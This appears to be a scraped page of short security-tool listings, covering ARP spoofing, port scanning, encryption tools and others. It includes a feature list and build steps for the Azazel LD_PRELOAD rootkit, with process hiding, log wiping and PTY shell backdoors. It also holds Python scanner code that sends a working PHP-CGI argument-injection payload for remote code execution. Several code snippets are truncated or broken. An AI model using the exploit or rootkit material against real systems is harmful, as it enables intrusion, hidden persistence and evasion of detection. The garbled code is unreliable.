Climber is an automated auditing tool to check UNIX/Linux systems misconfigurations which may allow local privilege escalation.

python >= 2.7

Climber needs Exscript, a Python module and a template processor for automating network connections over protocols such as Telnet or SSH.

This module is already included in Climber sources.


NetCommander 1.3 - An easy to use arp spoofing tool.
Copyleft Simone Margaritelli

Usage: [options]

  -h, --help            show this help message and exit
  -I IFACE, --iface=IFACE
                        Network interface to use if different from the default
  -N NETWORK, --network=NETWORK
                        Network to work on.
  -G GATEWAY, --gateway=GATEWAY
                        Gateway to use.
  -K, --kill            Kill targets connections instead of forwarding them.
  -D DELAY, --delay=DELAY
                        Delay in seconds between one arp packet and another,
                        default is 5.
  -A, --all             Keep spoofing and spoof all connected and later
                        connected interfaces.


pyCryptocat - A Cryptocat standalone python client

Authors and contributors
Simone Margaritelli (evilsocket)
Raffaele Forte

Cryptocat is free software that aims to provide an open, accessible Instant Messaging environment that encrypts your conversations and works right in your browser.
pyCryptocat is a Cryptocat standalone chat client written in Python, using python-webkit package to serve Cryptocat JS and HTML files.
Cryptocat provides multi-user (and private) instant messaging inside chatrooms. It uses the OTR protocol for encrypted two-party chat and the (upcoming) mpOTR protocol for encrypted multi-party chat.
The goal is to provide the easiest, most accessible way to chat while maintaining your privacy online.


Azazel is a userland rootkit written in C based off of the original LD_PRELOAD technique from Jynx rootkit. It is more robust and has additional features, and focuses heavily around anti-debugging and anti-detection. Features include log cleaning, pcap subversion, and more.

Avoids unhide, lsof, ps, ldd detection
Hides files and directories
Hides remote connections
Hides processes
Hides logins
PCAP hooks avoid local sniffing
Two accept backdoors with full PTY shells.

Crypthook encrypted accept() backdoor
Plaintext accept() backdoor

PAM backdoor for local privesc and remote entry
Log cleanup for utmp/wtmp entries based on pty
Uses xor to obfuscate static strings

Clone the sources
localhost:~ $ git clone

Build the rootkit
localhost:~ $ make

Hooking Methods
Azazel utilizes the same hooking methods as Jynx/Jynx2. You can hook individual programs at the time of execution by taking advantage of the LD_PRELOAD variable. By default, Azazel installs itself as into /lib. An entry is then added to /etc/ in order to hook system wide dynamically compiled programs.

Example runtime hooking of bash.
localhost:~ $ LD_PRELOAD=/lib/ bash -l

Instead of dlsym'ing direct libc functions by globally declaring old_syscall, Azazel has a new structure in azazel.h named syscall_list.
This allows all of the required functions to be linked upon initiation of the library.
Syscall function names are XORed by and written to const.h
Original libc functions can be accessed by using the preprocessor definitions also in const.h
Each definition has a prefix of SYS_name_of_function_in_caps.
For example to call libc's version of fopen, you would use syscalls[SYS_FOPEN].syscall_func();
typedef struct struct_syscalls {

PHP-CGI Remote Code Execution Scanner

PHP-CGI Remote Code Execution Scanner - This small python script scans for a number of variations on the PHP-CGI remote code execution vulnerability, includes "apache magica" and plesk paths, along with other misconfigurations.

Authored by infodox

# Written for /r/netsec
# test for the apache-magicka exploit bug. Added plesk and "how not to configure your box" paths.
# infodox - - 2013
# Twitter: @info_dox
# Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
# released under WTFPL
import requests
import sys

def scan(target):
    paths = ['/index.php', '/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi', '/cgi-bin/php4', '/phppath/php', '/phppath/php5', '/local-bin/php', '/local-bin/php5']
    for path in paths:
        probe(target, path)

def probe(target, path):
    print "[*] Testing Path: %s" %(path)
    trigger = path + "/?"
    trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%"
    trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F"
    trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F"
    trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75"
    trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6"
    trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64"
    trigger += "+%64%69%73%61%62%6C%65%5F%66%75%"
    trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2"
    trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65"
    trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+"
    trigger += "%61%75%74%6F%5F%70%72%65%70%65%6"
    trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%"
    trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E"
    url = target + trigger
    php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('1337x'); ?>"""
        haxor =, php)
        if "44e902a5aa760d79b76e070fa6725386" in haxor.text:
            print "Exploitable!"
    except Exception:
        print "Err, Someshit broke"

def main(args):
    if len(sys.argv) !=2:


Ipdecap can decapsulate traffic encapsulated within GRE, IPIP, 6in4, ESP (ipsec) protocols, and can also remove IEEE 802.1Q (virtual lan) header.
It reads packets from an pcap file, removes the encapsulation protocol, and writes them to another pcap file.

Goals are:
Extract encapsulated tcp flow to analyze them with conventional tcp tools (tcptrace, tcpflow, …)
Reduce pcap files size by removing encapsulation protocol

Ipdecap was first written to analyze a strange tcp behavior encapsulated by ESP, without intervention on vpn endpoints.


tar xvzf v0.7.tar.gz
cd ipdecap-0.7
make install

Command line:
A source pcap file
An output pcap file
A configuration file to decrypt ESP packets
Maybe a bpf filter to limit packets to process.

Ipdecap 0.5, decapsulate GRE, IPIP, 6in4, ESP packets, remove 802.1Q header - Loic Pefferkorn

Supported encapsulation protocols
6in4 (IPv6 encapsulated within IPv4)
ESP (ipsec, tunnel mode)

ESP algorithms
(crypt) des-cbc 3des-cbc aes128-cbc aes128-ctr null_enc
(auth) hmac_md5-96 hmac_sha1-96 aes_xcbc_mac-96 null_auth any96 any128 any160 any192 any256 any384 any512

ipdecap [-v] [-l] [-V] -i input.cap -o output.cap [-c esp.conf] [-f ]
-c, --conf configuration file for ESP parameters (IP addresses, algorithms, ... (see man ipdecap)
-h, --help this help message
-i, --input pcap file to process
-o, --output pcap file with decapsulated data
-f, --filter only process packets matching the bpf filter
-l, --list list availables ESP encryption and authentication algorithms
-V, --version print version
-v, --verbose verbose

Netscan Port Scanner

Netscan Port Scanner 1.0
Authored by Domenico Pinto
Netscan is a TCP and UDP SYN scanner that can also leverage Tor.

  gcc -lpthread netscan.c -o netscan
  Tcp/Udp/Tor port scanner with: synpacket, connect TCP/UDP and socks5(tor connection)

#include <math.h>
#include <time.h>
#include <stdio.h>
#include <errno.h>
#include <netdb.h>
#include <fcntl.h>
#include <ctype.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <net/if.h>
#include <pthread.h>
#include <termios.h>
#include <sys/mman.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <netinet/in_systm.h>

#define LPORT       1
#define HPORT       65535    
#define TCPSZ    sizeof(struct iphdr)+sizeof(struct tcphdr)
#define PSESZ       sizeof(struct pseudohdr)+sizeof(struct tcphdr)
#define TORPORT     9050
#define TORCTRL     9051
#define LOCALHOST   ""
#define SOCKS5      "\x05\x01\x00"
#define UDP_RESEND  6
#define UDP_PACKET  4096

/* global var */
static int verbose;
static int syn;
static int conn;
static int tor;
static int normal;
static int progress;
static int rangeport;
static int singleport;
static int specificport;
static int udp;
static int webserver;
static int banserv;

unsigned int delay=50000, timeout=1, timeout_s=1, timeout_u=200;
unsigned short min, max, port;
unsigned short index_p=, index_o=, index_c=, index_f=;
unsigned short ports[HPORT], open_p[HPORT], closed_p[HPORT], filtred_p[HPORT];
char *hostname, *eth0, *ipsource;

typedef enum { false, true } bool;

/* struct tcp syn packet */
struct pseudohdr  {
  in_addr_t src;
    in_addr_t dst;
    char padd;
    char proto;
    unsigned short len;

Nsdtool Netgear Switch Scanner

Nsdtool is a toolset of scripts used to detect Netgear switches in local networks.
The tool contains some extra features like bruteforce and setting a new password.
Netgear has its own protocol called NSDP (Netgear Switch Discovery Protocol), which is implemented to support security tests on the commandline.
It is not being bound to the delivered tools by Netgear.


The post-quantum cryptography tool.
This is a GnuPG-like unix program for encryption and signing that uses only quantum-computer-resistant algorithms:
McEliece cryptosystem (compact quasi-dyadic variant) for encryption
Hash-based Merkle tree algorithm (FMTSeq variant) for digital signatures

Why this?
Go read

package downloads:

There is a complete, UNIXy manual page supplied with the package. You can view it online here:

Quick How-To
Everything is meant to work mostly like GnuPG, but with some good simplicity margin. Let's play with random data!

ccr -g help
ccr -g fmtseq128-sha --name "John Doe"    # your signature key
ccr -g mceqd128 --name "John Doe"     # your encryption key

ccr -K  #watch the generated keys
ccr -k

ccr -p -a -o my_pubkeys.asc -F Doe  # export your pubkeys for friends

#see what people sent us
ccr -ina < friends_pubkeys.asc

#import Frank's key and rename it
ccr -ia -R friends_pubkeys.asc --name "Friendly Frank"

#send a nice message to Frank (you can also specify him by @12345 keyid)
ccr -se -r Frank < Document.doc > Message_to_frank.ccr

#receive a reply
ccr -dv -o Decrypted_verified_reply.doc <Reply_from_frank.ccr

#rename other's keys
ccr -m Frank -N "Unfriendly Frank"

#and delete pukeys of everyone who's Unfriendly
ccr -x Unfri

#create hashfile from a large file
ccr -sS hashfile.ccr < big_data.iso

#verify the hashfile
ccr -vS hashfile.ccr < the_same_big_data.iso

Option reference
For completeness I add listing of all options here (also available from ccr --help)
Usage: ./ccr [options]

Common options:
 -h, --help     display this help
 -V, --version  display version information
 -T, --test     perform (probably nonexistent) testing/debugging stuff

Global options:


SystemSearcher is a Linux security scanner written in Perl. It scans single hosts or subnets for anonymous FTP servers, TFTP servers, SMTP servers which allow relaying, SSH servers, Telnet servers, NFS servers with exported directories, mail servers, Web servers (HTTP/HTTPS), well- known trojan ports, and exploitable CGIs. You can also scan a list of specific servers and specific ports. It uses non-blocking socket communication with a 3-second socket timeout. It can also scan for proxy servers which are open to the world (on port 80,8080,1080, or 3128), and SMB servers or Windows boxes sharing directories.

Syndicate content